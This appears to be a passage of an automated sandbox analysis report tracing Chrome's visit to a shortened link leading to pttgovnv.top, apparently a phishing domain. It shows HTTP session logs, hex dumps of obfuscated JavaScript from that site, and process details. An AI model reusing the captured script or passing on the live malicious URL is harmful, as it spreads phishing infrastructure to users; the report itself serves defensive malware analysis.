36 37 31 30 3c 30 78 37 65 29 5f 30 78 31 62 65 35 38 32 3d 6e 65 77 20 55 69 6e
    Data Ascii: 0x10746e(0x369))break;}return _0xadc07e;};function Xe(){return new TransformStream({'transform'(_0x3cc4f1,_0x4c0189){He(_0x3cc4f1,_0x473658=>{const _0x474ee7=a1_0x1a33,_0x416710=_0x473658[_0x474ee7(0x314)];let _0x1be582;if(_0x416710<0x7e)_0x1be582=new Uin
    2024-09-01 22:28:25 UTC1369INData Raw: 33 30 38 30 2b 2b 5d 2c 5f 30 78 33 66 33 30 38 30 3d 3d 3d 5f 30 78 31 32 32 31 30 65 5b 30 78 30 5d 5b 5f 30 78 31 33 34 33 34 37 28 30 78 33 31 34 29 5d 26 26 28 5f 30 78 31 32 32 31 30 65 5b 5f 30 78 31 33 34 33 34 37 28 30 78 32 65 31 29 5d 28 29 2c 5f 30 78 33 66 33 30 38 30 3d 30 78 30 29 3b 72 65 74 75 72 6e 20 5f 30 78 31 32 32 31 30 65 5b 27 6c 65 6e 67 74 68 27 5d 26 26 5f 30 78 33 66 33 30 38 30 3c 5f 30 78 31 32 32 31 30 65 5b 30 78 30 5d 5b 5f 30 78 31 33 34 33 34 37 28 30 78 33 31 34 29 5d 26 26 28 5f 30 78 31 32 32 31 30 65 5b 30 78 30 5d 3d 5f 30 78 31 32 32 31 30 65 5b 30 78 30 5d 5b 5f 30 78 31 33 34 33 34 37 28 30 78 32 66 65 29 5d 28 5f 30 78 33 66 33 30 38 30 29 29 2c 5f 30 78 34 36 37 36 32 30 3b 7d 66 75 6e 63 74 69 6f 6e 20 51 65
    Data Ascii: 3080++],_0x3f3080===_0x12210e[0x0][_0x134347(0x314)]&&(_0x12210e[_0x134347(0x2e1)](),_0x3f3080=0x0);return _0x12210e['length']&&_0x3f3080<_0x12210e[0x0][_0x134347(0x314)]&&(_0x12210e[0x0]=_0x12210e[0x0][_0x134347(0x2fe)](_0x3f3080)),_0x467620;}function Qe
    2024-09-01 22:28:25 UTC1369INData Raw: 78 31 65 65 35 63 38 29 3c 5f 30 78 31 30 38 31 35 31 29 62 72 65 61 6b 3b 63 6f 6e 73 74 20 5f 30 78 35 33 66 66 33 31 3d 44 28 5f 30 78 31 65 65 35 63 38 2c 5f 30 78 31 30 38 31 35 31 29 3b 5f 30 78 32 62 62 61 35 32 5b 5f 30 78 35 32 35 39 66 62 28 30 78 33 38 64 29 5d 28 74 65 28 5f 30 78 35 34 34 33 61 64 3f 5f 30 78 35 33 66 66 33 31 3a 6a 5b 5f 30 78 35 32 35 39 66 62 28 30 78 33 38 33 29 5d 28 5f 30 78 35 33 66 66 33 31 29 2c 5f 30 78 64 39 62 39 33 29 29 2c 5f 30 78 34 61 65 32 64 39 3d 30 78 30 3b 7d 7d 7d 69 66 28 5f 30 78 31 30 38 31 35 31 3d 3d 3d 30 78 30 7c 7c 5f 30 78 31 30 38 31 35 31 3e 5f 30 78 31 36 63 34 34 39 29 7b 5f 30 78 32 62 62 61 35 32 5b 5f 30 78 35 32 35 39 66 62 28 30 78 33 38 64 29 5d 28 57 29 3b 62 72 65 61 6b 3b 7d 7d 7d
    Data Ascii: x1ee5c8)<_0x108151)break;const _0x53ff31=D(_0x1ee5c8,_0x108151);_0x2bba52[_0x5259fb(0x38d)](te(_0x5443ad?_0x53ff31:j[_0x5259fb(0x383)](_0x53ff31),_0xd9b93)),_0x4ae2d9=0x0;}}}if(_0x108151===0x0||_0x108151>_0x16c449){_0x2bba52[_0x5259fb(0x38d)](W);break;}}}
    2024-09-01 22:28:25 UTC1369INData Raw: 39 33 36 28 30 78 32 31 30 29 5d 7c 7c 7b 7d 2c 61 72 67 75 6d 65 6e 74 73 5b 5f 30 78 33 63 64 39 33 36 28 30 78 33 31 34 29 5d 3d 3d 30 78 30 29 72 65 74 75 72 6e 20 74 68 69 73 5b 5f 30 78 33 63 64 39 33 36 28 30 78 32 31 30 29 5d 3d 7b 7d 2c 74 68 69 73 3b 76 61 72 20 5f 30 78 35 39 36 35 35 36 3d 74 68 69 73 5b 5f 30 78 33 63 64 39 33 36 28 30 78 32 31 30 29 5d 5b 27 24 27 2b 5f 30 78 33 64 34 63 65 35 5d 3b 69 66 28 21 5f 30 78 35 39 36 35 35 36 29 72 65 74 75 72 6e 20 74 68 69 73 3b 69 66 28 61 72 67 75 6d 65 6e 74 73 5b 5f 30 78 33 63 64 39 33 36 28 30 78 33 31 34 29 5d 3d 3d 30 78 31 29 72 65 74 75 72 6e 20 64 65 6c 65 74 65 20 74 68 69 73 5b 5f 30 78 33 63 64 39 33 36 28 30 78 32 31 30 29 5d 5b 27 24 27 2b 5f 30 78 33 64 34 63 65 35 5d 2c 74 68
    Data Ascii: 936(0x210)]||{},arguments[_0x3cd936(0x314)]==0x0)return this[_0x3cd936(0x210)]={},this;var _0x596556=this[_0x3cd936(0x210)]['$'+_0x3d4ce5];if(!_0x596556)return this;if(arguments[_0x3cd936(0x314)]==0x1)return delete this[_0x3cd936(0x210)]['$'+_0x3d4ce5],th
    2024-09-01 22:28:25 UTC1369INData Raw: 74 68 69 73 5b 5f 30 78 33 33 64 36 33 35 28 30 78 32 31 30 29 5d 5b 27 24 27 2b 5f 30 78 31 66 35 63 30 35 5d 7c 7c 5b 5d 3b 7d 2c 6c 5b 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 32 65 36 29 5d 5b 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 33 33 36 29 2b 27 72 73 27 5d 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 36 31 34 32 34 29 7b 63 6f 6e 73 74 20 5f 30 78 34 35 31 65 63 39 3d 61 31 5f 30 78 35 34 31 34 36 61 3b 72 65 74 75 72 6e 21 21 74 68 69 73 5b 5f 30 78 34 35 31 65 63 39 28 30 78 31 33 39 29 5d 28 5f 30 78 33 36 31 34 32 34 29 5b 5f 30 78 34 35 31 65 63 39 28 30 78 33 31 34 29 5d 3b 7d 3b 63 6f 6e 73 74 20 67 3d 28 28 28 29 3d 3e 74 79 70 65 6f 66 20 73 65 6c 66 3c 27 75 27 3f 73 65 6c 66 3a 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3c 27 75 27 3f 77
    Data Ascii: this[_0x33d635(0x210)]['$'+_0x1f5c05]||[];},l[a1_0x54146a(0x2e6)][a1_0x54146a(0x336)+'rs']=function(_0x361424){const _0x451ec9=a1_0x54146a;return!!this[_0x451ec9(0x139)](_0x361424)[_0x451ec9(0x314)];};const g=((()=>typeof self<'u'?self:typeof window<'u'?w


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    30192.168.2.449774104.21.47.250443928C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-09-01 22:28:25 UTC364OUTGET /api/MC45NTAzNDk0MzkyMzA0MDQ4 HTTP/1.1
    Host: pttgovnv.top
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-09-01 22:28:25 UTC571INHTTP/1.1 404 Not Found
    Date: Sun, 01 Sep 2024 22:28:25 GMT
    Transfer-Encoding: chunked
    Connection: close
    Access-Control-Allow-Origin: *
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4zfsROfFYHjD7zezXmHRpnVd3QrL8xEF311IMIqrMqqlNXLSLqi4Ux5R%2BEREmu8zWFI5PUp3T8H7x%2FJgnMV3NfjnI%2FRXPsij1V%2FxrGvw7H9liAgF4YsLplOdSDHYBEY%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8bc8b17c5fe943ab-EWR
    alt-svc: h3=":443"; ma=86400
    2024-09-01 22:28:25 UTC5INData Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    31192.168.2.44977535.190.80.1443928C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-09-01 22:28:26 UTC531OUTOPTIONS /report/v4?s=4zfsROfFYHjD7zezXmHRpnVd3QrL8xEF311IMIqrMqqlNXLSLqi4Ux5R%2BEREmu8zWFI5PUp3T8H7x%2FJgnMV3NfjnI%2FRXPsij1V%2FxrGvw7H9liAgF4YsLplOdSDHYBEY%3D HTTP/1.1
    Host: a.nel.cloudflare.com
    Connection: keep-alive
    Origin: https://pttgovnv.top
    Access-Control-Request-Method: POST
    Access-Control-Request-Headers: content-type
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-09-01 22:28:26 UTC336INHTTP/1.1 200 OK
    Content-Length: 0
    access-control-max-age: 86400
    access-control-allow-methods: OPTIONS, POST
    access-control-allow-origin: *
    access-control-allow-headers: content-length, content-type
    date: Sun, 01 Sep 2024 22:28:26 GMT
    Via: 1.1 google
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    32192.168.2.44977635.190.80.1443928C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-09-01 22:28:27 UTC476OUTPOST /report/v4?s=4zfsROfFYHjD7zezXmHRpnVd3QrL8xEF311IMIqrMqqlNXLSLqi4Ux5R%2BEREmu8zWFI5PUp3T8H7x%2FJgnMV3NfjnI%2FRXPsij1V%2FxrGvw7H9liAgF4YsLplOdSDHYBEY%3D HTTP/1.1
    Host: a.nel.cloudflare.com
    Connection: keep-alive
    Content-Length: 410
    Content-Type: application/reports+json
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-09-01 22:28:27 UTC410OUTData Raw: 5b 7b 22 61 67 65 22 3a 32 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 38 34 38 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 34 37 2e 32 35 30 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 70 74 74 67 6f 76 6e 76 2e 74 6f 70 2f 61 70 69
    Data Ascii: [{"age":2,"body":{"elapsed_time":848,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"104.21.47.250","status_code":404,"type":"http.error"},"type":"network-error","url":"https://pttgovnv.top/api
    2024-09-01 22:28:27 UTC168INHTTP/1.1 200 OK
    Content-Length: 0
    date: Sun, 01 Sep 2024 22:28:27 GMT
    Via: 1.1 google
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    33192.168.2.44978635.190.80.1443928C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-09-01 22:29:26 UTC531OUTOPTIONS /report/v4?s=4zfsROfFYHjD7zezXmHRpnVd3QrL8xEF311IMIqrMqqlNXLSLqi4Ux5R%2BEREmu8zWFI5PUp3T8H7x%2FJgnMV3NfjnI%2FRXPsij1V%2FxrGvw7H9liAgF4YsLplOdSDHYBEY%3D HTTP/1.1
    Host: a.nel.cloudflare.com
    Connection: keep-alive
    Origin: https://pttgovnv.top
    Access-Control-Request-Method: POST
    Access-Control-Request-Headers: content-type
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-09-01 22:29:26 UTC336INHTTP/1.1 200 OK
    Content-Length: 0
    access-control-max-age: 86400
    access-control-allow-methods: OPTIONS, POST
    access-control-allow-origin: *
    access-control-allow-headers: content-length, content-type
    date: Sun, 01 Sep 2024 22:29:26 GMT
    Via: 1.1 google
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    34192.168.2.44978735.190.80.1443928C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-09-01 22:29:26 UTC533OUTOPTIONS /report/v4?s=W9k%2Bjq46Hg7N4vTRms7HEZSAMsskhKIgDi0uYfpEvcKUMT2%2BSIXoKJoJ%2Bnwj8n1XSeKgLXDvE%2F2YXyG61vjCReK5YAUPBfJIaMqStMnZdW5alF03gbukWpGOs4%2BJPZg%3D HTTP/1.1
    Host: a.nel.cloudflare.com
    Connection: keep-alive
    Origin: https://pttgovnv.top
    Access-Control-Request-Method: POST
    Access-Control-Request-Headers: content-type
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-09-01 22:29:26 UTC336INHTTP/1.1 200 OK
    Content-Length: 0
    access-control-max-age: 86400
    access-control-allow-methods: OPTIONS, POST
    access-control-allow-origin: *
    access-control-allow-headers: content-length, content-type
    date: Sun, 01 Sep 2024 22:29:26 GMT
    Via: 1.1 google
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    35192.168.2.44978935.190.80.1443928C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-09-01 22:29:27 UTC478OUTPOST /report/v4?s=W9k%2Bjq46Hg7N4vTRms7HEZSAMsskhKIgDi0uYfpEvcKUMT2%2BSIXoKJoJ%2Bnwj8n1XSeKgLXDvE%2F2YXyG61vjCReK5YAUPBfJIaMqStMnZdW5alF03gbukWpGOs4%2BJPZg%3D HTTP/1.1
    Host: a.nel.cloudflare.com
    Connection: keep-alive
    Content-Length: 453
    Content-Type: application/reports+json
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-09-01 22:29:27 UTC453OUTData Raw: 5b 7b 22 61 67 65 22 3a 35 39 39 35 39 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 39 31 31 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 34 37 2e 32 35 30 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 72 65 73 70 6f 6e 73 65 2e 69 6e 76 61 6c 69 64 2e 69 6e 63 6f 6d 70 6c 65 74 65 5f 63 68 75 6e 6b 65 64 5f 65 6e 63 6f 64 69 6e 67 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74
    Data Ascii: [{"age":59959,"body":{"elapsed_time":911,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"104.21.47.250","status_code":200,"type":"http.response.invalid.incomplete_chunked_encoding"},"type":"net
    2024-09-01 22:29:27 UTC168INHTTP/1.1 200 OK
    Content-Length: 0
    date: Sun, 01 Sep 2024 22:29:26 GMT
    Via: 1.1 google
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    36192.168.2.44978835.190.80.1443928C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-09-01 22:29:27 UTC476OUTPOST /report/v4?s=4zfsROfFYHjD7zezXmHRpnVd3QrL8xEF311IMIqrMqqlNXLSLqi4Ux5R%2BEREmu8zWFI5PUp3T8H7x%2FJgnMV3NfjnI%2FRXPsij1V%2FxrGvw7H9liAgF4YsLplOdSDHYBEY%3D HTTP/1.1
    Host: a.nel.cloudflare.com
    Connection: keep-alive
    Content-Length: 454
    Content-Type: application/reports+json
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-09-01 22:29:27 UTC454OUTData Raw: 5b 7b 22 61 67 65 22 3a 35 39 39 39 36 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 30 36 33 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 34 37 2e 32 35 30 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 72 65 73 70 6f 6e 73 65 2e 69 6e 76 61 6c 69 64 2e 69 6e 63 6f 6d 70 6c 65 74 65 5f 63 68 75 6e 6b 65 64 5f 65 6e 63 6f 64 69 6e 67 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65
    Data Ascii: [{"age":59996,"body":{"elapsed_time":1063,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"104.21.47.250","status_code":200,"type":"http.response.invalid.incomplete_chunked_encoding"},"type":"ne
    2024-09-01 22:29:27 UTC168INHTTP/1.1 200 OK
    Content-Length: 0
    date: Sun, 01 Sep 2024 22:29:26 GMT
    Via: 1.1 google
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


    Click to jump to process

    Click to jump to process

    Click to jump to process

    Target ID:0
    Start time:18:28:08
    Start date:01/09/2024
    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
    Wow64 process (32bit):false
    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Imagebase:0x7ff76e190000
    File size:3'242'272 bytes
    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:low
    Has exited:false

    Target ID:2
    Start time:18:28:12
    Start date:01/09/2024
    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
    Wow64 process (32bit):false
    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2088,i,12425730417915934961,13765664541890287119,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Imagebase:0x7ff76e190000
    File size:3'242'272 bytes
    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:low
    Has exited:false

    Target ID:3
    Start time:18:28:14
    Start date:01/09/2024
    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
    Wow64 process (32bit):false
    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://is.gd/pttgovnvv"
    Imagebase:0x7ff76e190000
    File size:3'242'272 bytes
    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:low
    Has exited:true

    No disassembly